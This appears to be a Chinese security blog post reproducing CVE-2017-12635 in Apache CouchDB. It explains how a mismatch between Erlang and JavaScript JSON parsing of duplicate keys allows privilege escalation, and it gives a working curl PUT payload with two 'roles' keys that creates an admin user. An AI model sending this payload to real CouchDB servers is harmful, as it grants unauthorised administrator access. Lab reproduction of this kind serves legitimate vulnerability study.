漏洞复现----50、Couchdb 垂直权限绕过漏洞(CVE-2017-12635)

最新推荐文章于 2024-05-18 08:00:00 发布
最新推荐文章于 2024-05-18 08:00:00 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: 网络安全技术 # 漏洞复现 文章标签: Couchdb 垂直权限绕过 CVE-2017-12635
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sycamorelg/article/details/118297747
版权

文章目录

一、Apache CouchDb

Apache CouchDB 是一个开源的面向文档的 NoSQL 数据库,用 Erlang 实现。CouchDB 使用多种格式和协议来存储、传输和处理其数据。它使用 JSON 存储数据,使用 MapReduce 作为其查询语言的 JavaScript,以及作为 API 的 HTTP。Erlang的JSON解析工具:Jiffy

二、漏洞解析

漏洞版本:小于 1.7.0 | 小于 2.1.1

漏洞描述

CouchDB 使用 JSON 来进行数据交换,并将其作为一个 Erlang proplist。但是这种实现就导致了在 CouchDB 中,当涉及到 JSON 解析时,允许 JSON 文档具有多个同名的键。

proplists 模块:常用于处理配置文件和函数选项,proplists对内部数据结构是Key-Value键值对形式,第一个元素做key用来查询和删除,如果一个key有多个值就会使用第一次出现的值,其它被忽略。

CVE-2017-12635是由于基于Erlang的JSON 解析器和基于 JavaScript 的 JSON 解析器的差异造成的,所以先了解一下Javascript JSON解析器jiffy的解析器解析规则:
{"foo":"bar", "foo":"baz"}为例:
1、Erlang

> jiffy:decode("{\"foo\":\"bar\", \"foo\":\"baz\"}"). 
{[{<<"foo">>,<<"bar">>},{<<"foo">>,<<"baz">>}]}

2、Javascript

> JSON.parse("{\"foo\":\"bar\", \"foo\": \"baz\"}")
{foo: "baz"}

在 CouchDB 数据库_users中创建或修改用户时,服务器会使用 Javascript 函数来管理用户的访问控制:

例如,要创建一个用户,将一个文档插入到_users 数据库,通过执行PUT /_users/org.couchdb.user:set_username,用户文档必须包含顶级key –roles ,为用户提供额外的权限。 "name": "test", "roles": ["_admin"]–>这个就是为用户test设置admin权限。

_users 数据库的情况下,允许攻击者提交带有两个 roles 键的 _users文档。第一个roles可以设置为任何自分配角色,因为JavaScript的JSON解析只会看到第二个roles。在后续请求中对用户进行身份验证时,roles是从 Erlang-JSON 表示中读取的,并且在该实现中返回第一个roles,第一个roles可以设置为任何角色,包括_admin 角色,赋予用户管理员权限。

curl -X PUT 'http://localhost:5984/_users/org.couchdb.user:test'
--data-binary 
'{
  "type": "user",
  "name": "test",
  "roles": ["_admin"],
  "roles": [],
  "password": "password"
}'

并且CouchDB的 getter 函数只会返回第一个值:

% Within couch_util:get_value 
lists:keysearch(Key, 1, List).

因此,我们就可以绕过相关的输入验证创建了一个具有admin权限的用户test。

三、漏洞复现

访问登陆页面,通过执行PUT /_users/org.couchdb.user:set_username创建两个roles就可以绕过登陆限制创建admin权限用户。
在这里插入图片描述
在这里插入图片描述

参考链接:
https://vulhub.org/#/environments/couchdb/CVE-2017-12635/

李沉肩
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
CouchDB 漏洞 CVE-2017-12635/12636
sechelper的博客
02-11 370
CouchDBCVE-2017-12635和12636联合利用,详细漏洞,exp下载获取
Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
weixin_46239998的博客
01-01 825
应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。影响版本:小于 1.7.0 以及 小于 2.1.1。密码:password。
未授权访问:CouchDB 未授权访问漏洞
最新发布
qq_68163788的博客
05-18 399
Apache CouchDB是一个开源数据库,应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序),默认会在5984端口开放Restful的API接口,如果使用SSL的话就会监听在6984端口,用于数据库的管理功能。 其HTTP Server默认开启时没有进行验证,而且绑定在0.0.0.0,所有用户均可通过API访问导致未授权访问。
【vulhub漏洞】通过 PUT 方法的 Tomcat 任意写入文件漏洞 (CVE-2017-12615)-02
书山上的云的博客
01-11 3648
一、漏洞原理 Tomcat设置了写权限(readonly=false),导致我们可以向服务器写入文件。 CVE-2017-12615:远程代码执行漏洞。只需参数readonly设置为false或者使用参数readonly设置启用WebDAV servlet false。此配置将允许任何未经身份验证的用户上传文件(如WebDAV中所使用的)。 <servlet> <servlet-name>default</servlet-name> <servlet
Vulhub漏洞系列:Couchdb漏洞CVE-2017-12635、CVE-2017-12636)
weixin_43072923的博客
05-24 1496
Vulhub漏洞系列:Couchdb漏洞CVE-2017-12635、CVE-2017-12636)00.前言01.Couchdb简介02.漏洞描述03.漏洞 00.前言 这篇文章将对该漏洞进行简介并,同时简要说明Vulhub的使用方法,适合小白一起学习,大佬看看就好☺ 01.Couchdb简介 CouchDB是一个利用JSON文件来存贮数据,javascript作为MapReduce查询,以及常规HTTP作为API的且面向文档的开源数据库管理系统。 02.漏洞描述 0x01:CVE-2017
13 - vulhub - Couchdb 任意命令执行漏洞CVE-2024-12636)
04-16 792
这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。基本上主流的和经典的都有,这里我就不放图了,版权问题,个人看看是没有问题的。
Apache CouchDB信息泄露漏洞(CVE-2023-26268)通告
05-05
Apache CouchDB 信息泄露漏洞(CVE-2023-26268)通告 Apache CouchDB 是一个开源的 NoSQL 文档数据库,以基于 JSON 的文档格式收集和存储数据,提供了高可用性和高可靠性。近日,深信服安全团队监测到 Apache ...
CouchDBClient:CouchDB客户端-.NET客户端框架,用于使用CouchDB
02-03
CouchDBClient(CouchDB .NET客户端) CouchDBClient是用于从.NET代码使用CouchDB的框架。 它抽象化并简化了CouchDB的用法,因此您可以轻松地从应用程序代码中使用它。 在框架下掩盖了使用纯json和http请求/响应的...
couchdb-orm:一个简单的CouchDB ORM
02-04
couchdb-orm:一个简单的CouchDB ORM
guile-couchdb:指导方案的Couchdb
02-04
guile-couchdb:指导方案的Couchdb
服务攻防-数据库安全-Influxdb&H2database&CouchDB&ElasticSearch数据库漏洞
ran的博客
05-07 2289
默认端口:InfluxDB 是一个开源的时间序列数据库,旨在处理大规模数据处理和分析的高写入和查询负载。它针对实时存储和查询大量时间戳数据进行了优化。InfluxDB 提供了一种类似 SQL 的查询语言称为 InfluxQL,允许用户从数据库中检索和操作数据。它还支持各种客户端库和插件,以与其他数据源和工具集成。InfluxDB 的一些主要特点包括:高写入和查询性能:InfluxDB 优化了高吞吐量数据摄取和检索,非常适合实时数据处理和分析。
#发布npm包遇到错误,因为用了淘宝镜像地址的原因的解决方法-403 403 Forbidden - PUT https://registry.npmmirror.com/-/user/org.cou
商务合作 / 项目定制开发 / 前端一对一培训、答疑
08-28 2862
使用npm login(也可以使用)登录准备发布npm依赖包大意是你的npm使用了镜像地址,无权限发布。
Couchdb 垂直权限绕过漏洞CVE-2017-12635)
锋刃科技的博客
05-06 3248
简介 Apache CouchDB是一个开源的NoSQL数据库,专注于易用性和成为“完全拥抱web的数据库”。它是一个使用JSON作为数据存储格式,javascript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。 影响版本 版本<1.7.0以及 <2.1.1 环境搭建 https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635 编译及启动环境: ...
couchdb 垂直权限绕过漏洞cve-2017-12635)
whatday的专栏
06-08 783
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和Ja
CouchDB漏洞
weixin_44259979的博客
10-07 787
CouchDB漏洞
利用CouchDB未授权访问漏洞执行任意系统命令
3569
12-01 2868
0x00 前言 5月16日阿里云盾攻防对抗团队从外部渠道获知CouchDB数据库存在未授权访问漏洞(在配置不正确的情况下)。经过测试,云盾团队率先发利用该未授权访问漏洞不仅会造成数据的丢失和泄露,甚至可执行任意系统命令。云盾安全专家团队第一时间完成了漏洞上报、安全评级,并通知了所有可能受影响的用户。下面将对该漏洞的出处和技术细节做详细解释。 http://static.hx99.net/
Hyperledger-Fabric 系统架构图
03-26
由于 Hyperledger-Fabric 是一个底层的区块链框架,它的系统架构比较杂,包括了多个组件和模块。下面是一个简化的 Hyperledger-Fabric 系统架构图: ![Hyperledger-Fabric 系统架构图](https://i.imgur.com/A8I6NuL.png) 从图中可以看出,Hyperledger-Fabric 的系统架构主要包括以下组件和模块: - 客户端(Client):客户端是区块链系统的使用者,可以通过 SDK 与区块链网络进行交互,包括提交交易、查询数据等操作。客户端可以是 Web 应用程序、移动应用程序、IoT 设备等。 - 区块链网络(Blockchain Network):区块链网络由多个 Peer 和一个 Ordering Service 组成,每个 Peer 都有自己的账本,用于保存区块链上的交易记录和状态数据。 - Peer 节点(Peer Node):Peer 节点是区块链网络的核心,它可以执行智能合约、验证交易,并将交易记录和状态数据保存到自己的账本中。Peer 节点之间可以相互通信和交互数据,还可以进行背书(Endorsement)操作,即对交易进行签名,用于确保交易的真实性和合法性。 - Ordering Service 节点(Ordering Service Node):Ordering Service 节点是区块链网络的一部分,负责将交易打包成区块,并将区块传播到所有的 Peer 节点。Ordering Service 节点可以使用不同的共识算法来处理交易,例如 Kafka、Raft 等。 - 智能合约(Smart Contract):智能合约是 Hyperledger-Fabric 的核心概念,它是一段可编程的代码,用于对交易进行处理和执行。智能合约可以使用不同的编程语言编写,例如 Go、Java、JavaScript 等。 - 认证和授权服务(Authentication and Authorization Service):认证和授权服务是用于验证客户端和 Peer 节点身份的服务,它可以使用不同的身份验证协议和技术,例如 TLS、PKI 等。 - 数据库(Database):Hyperledger-Fabric 使用不同的数据库系统来保存交易记录和状态数据,例如 LevelDB、CouchDB 等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值